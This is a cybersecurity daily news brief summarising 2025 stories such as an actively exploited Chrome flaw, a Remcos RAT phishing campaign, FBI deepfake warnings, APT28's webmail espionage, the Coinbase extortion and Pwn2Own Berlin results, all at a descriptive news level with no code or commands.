Daily Brief

A Darktrace report cites that 74% of cybersecurity professionals worldwide are already finding AI as a menacing challenge to their defenses. Increasing use of AI in cyberattacks includes sophisticated phishing and malware, demanding an equally advanced AI-augmented response from security sectors. In 2023, AI-based social engineering attacks have surged by 135%, coinciding with the rise of ChatGPT and similar technologies. Despite the growth in AI-powered threats, many companies feel underprepared due to a significant cybersecurity skills shortage; 45% of professionals expressed concerns over preparedness. The current focus for most companies is leveraging AI to enhance the speed and efficiency of their cybersecurity responses, with 95% acknowledging AI's potential benefits. 88% of the companies prefer AI-driven integrated cybersecurity platforms over isolated solutions, aiming for a comprehensive and preventative defense mechanism. The Darktrace study highlights a gap in understanding the specific types of AI used in cybersecurity, with only 42% of professionals fully aware of the AI models employed.

CISA has issued warnings to U.S. federal agencies about attacks exploiting a critical vulnerability in the Chrome web browser. The flaw, identified as CVE-2025-4664, was disclosed by Solidlab security researcher Vsevolod Kokorin and subsequently patched by Google. The vulnerability allows attackers to leak sensitive cross-origin data through specially crafted HTML pages, potentially leading to account takeovers. Though Google's update aimed at fixing this issue was released, the company suggested that an exploit for this vulnerability might already exist in the public domain. Following the discovery, CISA mandated federal agencies to apply the Chrome patch by May 7th to mitigate potential breaches, highlighting the directive under November 2021's Binding Operational Directive (BOD) 22-01. This incident marks the second Chrome zero-day exploited this year, previously targeting entities like Russian government organizations for cyber-espionage. Network defenders, irrespective of their affiliation with federal agencies, are urged to prioritize patching this security flaw to protect against similar exploitations.

Cybersecurity experts have uncovered a campaign using PowerShell shellcode to deliver the Remcos RAT, a form of malware. Malicious LNK files embedded within ZIP archives pose as Office documents, exploiting tax-related themes to deceive users into opening them. The attack leverages the legitimate mshta.exe Microsoft tool to run HTA files that initiate the download of further malicious components and registry changes for persistence. The malware operates entirely in memory, evading many traditional security measures by not leaving traces on the system's disk. Remcos RAT allows full system control with capabilities like keystroke logging, screenshot capture, and system information retrieval. Communication with its command-and-control server is secured via TLS, facilitating ongoing data theft and system manipulation. The threat of such fileless malware highlights the limitations of conventional security defenses and underscores the need for advanced detection solutions, including real-time PowerShell monitoring and improved email security. This particular technique of fileless infection and the evolution of threat mechanisms like AI-enabled polymorphism represent significant challenges to current cybersecurity approaches.

Modern applications evolve quickly, often outpacing the security measures implemented by businesses. Security teams frequently scan code in isolation and respond to cloud threats later than optimal, causing vulnerabilities. Attackers exploit these security gaps within hours, while organizations can take days to react to critical cloud alerts. Security efforts are often divided across different teams, such as DevSecOps, CloudSec, and SOC, leading to inefficiencies and uncoordinated responses. The webinar, hosted by Ory Segal of Cortex Cloud at Palo Alto Networks, addresses how to integrate application security across coding, cloud infrastructure, and security operations centers. Attendees will learn strategies for a unified security approach, enhancing protection against potential breaches and attacks. The session targets professionals in AppSec, CloudOps, DevSecOps, and SOC, aiming to provide actionable insights for immediate application.

Sayee Chaitanya Reddy Devagiri pleaded guilty to wire fraud conspiracy involving $2.59 million through fraudulent DoorDash deliveries. Involved parties created fake customer and driver accounts to order and verify delivery of non-existent food. Login credentials of DoorDash employees were used to manipulate order assignments within the company's system. Conspirators triggered false payments by reporting these phantom deliveries as completed, utilizing a vendor affiliated with DoorDash. The scheme was enabled by insider access, with some credentials linked to a brief former employee, Tyler Thomas Bottenhorn. This fraudulent operation, which repeated hundreds of times, was reportedly executed in less than five minutes per transaction. Devagiri is the third defendant to plead guilty and faces up to 20 years in prison plus a $250,000 fine. His court return is scheduled for September 16.

The FBI has issued a warning about scammers using deepfake audio to impersonate senior US government officials in a fraud campaign. This fraudulent activity primarily targets former and current US government personnel, seeking to obtain their login credentials. Impersonators use advanced AI technologies for voice spoofing in smishing (SMS phishing) and vishing (voice phishing) attacks. The attackers encourage victims to communicate via an unspecified messaging platform, presumably to evade detection. The FBI advises verifying the authenticity of suspicious communications by contacting officials through official numbers and being cautious of any anomalies in speech that could indicate a deepfake. Techniques like listening for unusual verbal tics or phrases are recommended to identify potential AI-generated impersonations. The widespread accessibility and reduced costs of AI technology have significantly enhanced the capabilities and incidence of deepfake scams.

ESET researchers identified a global cyberespionage effort labeled 'RoundPress,' led by Russian state-sponsored hackers APT28. The campaign began in 2023 and uses zero-day and n-day exploits in webmail servers to access sensitive emails from government entities. Targets include government offices in several countries, military units, defense companies, and critical infrastructure predominantly in Europe. Spear-phishing tactics are employed, utilizing current event-themed emails embedded with malicious JavaScript to exploit webmail XSS vulnerabilities. Simply opening the email triggers the malicious scripts, which steal webmail credentials and sensitive data without further victim interaction. Collected data includes email content, contacts, webmail settings, login history, and two-factor authentication details, all exfiltrated to controlled servers. The campaign has adapted over time, targeting multiple webmail platforms such as Roundcube, Horde, MDaemon, and Zimbra. While there is no reported activity for 2025, the consistent emergence of new XSS vulnerabilities in webmail products suggests potential continuation or evolution of these threat tactics.

The FBI issued a public service announcement alerting that AI-based voice deepfakes have been used in phishing attacks against U.S. officials since April 2025. Perpetrators impersonate senior U.S. officials using AI-generated audio to establish rapport and subsequently gain access to personal and governmental accounts. The agency highlighted the use of smishing (text-based) and vishing (voice-based) techniques that appear to originate from high-ranking officials to deceive targets. Once access is obtained, attackers exploit the breached accounts to gather sensitive information from, and about, other government individuals and potentially fund transfers. The warning aligns with a historical pattern, referencing a 2021 FBI notification regarding the increasing sophistication and expected proliferation of deepfakes in cyber operations. Concerns about deepfakes' role in cybersecurity have been escalating, with Europol and the U.S. Department of Health and Human Services noting its potential misuse in various frauds and social engineering since 2021. The recent misuse of deepfake technology in an attack on LastPass, involving a deepfake audio of the CEO, underscores the tangible threats posed by these technologies. The announcement aims to raise awareness and encourage vigilance, providing mitigation strategies to identify and defend against such deceptive tactics.

Scattered Spider, previously targeting UK retailers, has now begun attempts on major US retailers' IT structures. The attacks involve potential ransomware deployment, specifically DragonForce, as identified by Mandiant, Google's threat intelligence branch. In response to these attacks, affected organizations have initiated stringent cybersecurity measures, sometimes resulting in operational disruptions. The group, consisting mostly of young males from the US and UK, had paused operations following multiple arrests but resumed with new vigor recently. Under 10 prominent US retail companies have been targeted, facing various levels of security breaches and preventive action impacts. Scattered Spider's patterns show a shift in focus to different sectors periodically, with a prediction of soon moving on from the retail industry. The possibility of increased law enforcement action looms due to the high-profile nature of these cyberattacks.

Meta plans to use E.U. user data for AI training without explicit opt-in consent, set to begin May 27, 2025. Austrian privacy group noyb issued a cease-and-desist letter to Meta, threatening a class action lawsuit over these plans. Meta argues it has a "legitimate interest" in using the data, bypassing the need for direct user consent which contradicts GDPR requirements. The initiative had previously been paused in June 2024 after concerns from Irish data protection authorities, but Meta intends to proceed. Noyb argues merely 10% of user consent would suffice for Meta's AI to learn about E.U. linguistic and cultural diversity. Other AI providers reportedly generate superior models without leveraging social network data, challenging Meta's necessity claim. National data protection authorities have not yet addressed the legality of this non-consensual data usage for AI by Meta. In response to the allegations, Meta insists its actions are lawful and that it provides users with an option to object to data processing.

Nova Scotia Power confirmed a significant data breach involving sensitive customer data due to unauthorized network access discovered last month. The breach was first detected on April 28, 2025, with investigations revealing that the breach occurred on March 19, 2025, nearly two months prior to alerting customers. The company, a primary utility in Canada servicing over 500,000 customers, stated the breach had no impact on electricity production and distribution but disrupted internal operations. Stolen data includes personal information, though the company has not observed any misuse of the data so far. Nova Scotia Power is offering two years of free credit monitoring to affected customers through TransUnion to mitigate potential risks. Customers have been advised to stay vigilant against phishing attempts, as threat actors may impersonate the utility company. No ransomware gangs have claimed responsibility for this cybersecurity incident.

Coinbase was targeted by cybercriminals who extorted $20 million after bribing support staff to steal customer data. Less than 1 percent of Coinbase’s monthly transacting users were affected, and no passwords or private keys were compromised. The stolen data was used in social engineering attacks to defraud Coinbase customers. Coinbase has responded by offering a $20 million bounty for information leading to the arrest of the perpetrators, rather than paying the ransom. The company terminated the involved personnel, boosted fraud monitoring defenses, and has taken steps to reimburse affected customers. Additional measures include investment in anti-fraud technologies and plans to centralize support operations in the US. Total remediation and reimbursement costs are estimated between $180 million to $400 million. Despite the breach, Coinbase states there was no access to customer funds and no material operational impact, though its shares dropped by over 7%.

Pwn2Own Berlin 2025 showcased successful hacks on Windows 11, Red Hat Linux, and Oracle VirtualBox, distributing $260,000 in prizes to participants. Security researchers demonstrated multiple zero-day exploits, securing root or SYSTEM privileges through various vulnerabilities including use-after-free, integer overflow, and out-of-bounds write. The DEVCORE Research Team, among others, highlighted critical security flaws in enterprise technologies by exploiting previously unknown vulnerabilities. Notable achievements included an exploit chain that allowed code execution on the underlying OS of Oracle VirtualBox and Docker Desktop. Pwn2Own 2025 targets a wide range of technologies including AI, web browsers, virtualization tools, and enterprise applications, with potential earnings exceeding $1,000,000. No attempts were made on the Tesla models available despite being included as targets in this year's competition. Following the competition, vendors have a 90-day window to patch the security vulnerabilities exposed during the event.

Socket has acquired Coana, a startup aimed at improving how security vulnerabilities are prioritized by letting users know which alerts can be ignored. Coana, founded by researchers from Aarhus University, employs reachability analysis to determine if attackers can realistically exploit reported vulnerabilities. The tool's efficiency lies in its use of static analysis, which allows for rapid, scalable evaluations with minimal false negatives or positives. Traditional security tools produce an excessive number of alerts, creating noise and increasing workload for developers, which Coana’s approach aims to reduce. Reachability analysis by Coana is especially effective for dynamic languages like JavaScript and Python, where static analysis is more challenging. The acquisition helps Socket address its users' concerns regarding overwhelming security alerts from dependency scans in application software libraries. Socket's CEO noted an ongoing challenge with the volume of security alerts and mentioned catching around 500 malicious packages weekly.

Tor has launched Oniux, a new tool to anonymize network traffic of any Linux application through the Tor network. Unlike torsocks, Oniux employs Linux namespaces for creating isolated network environments, enhancing security by preventing data leaks. Oniux isolates applications at the kernel level, ensuring all traffic is routed through Tor, utilizing a virtual interface and custom DNS settings. The tool is designed to be leak-proof with kernel-enforced isolation, which significantly surpasses the capabilities of torsocks. Despite its innovative approach, Oniux is still in an experimental phase and not recommended for critical operations until further testing. Tor has published the source code and calls for community engagement to test and refine Oniux to ensure its reliability for broader deployment. Users interested in testing the tool can install it using Rust and specific commands provided by the Tor Project.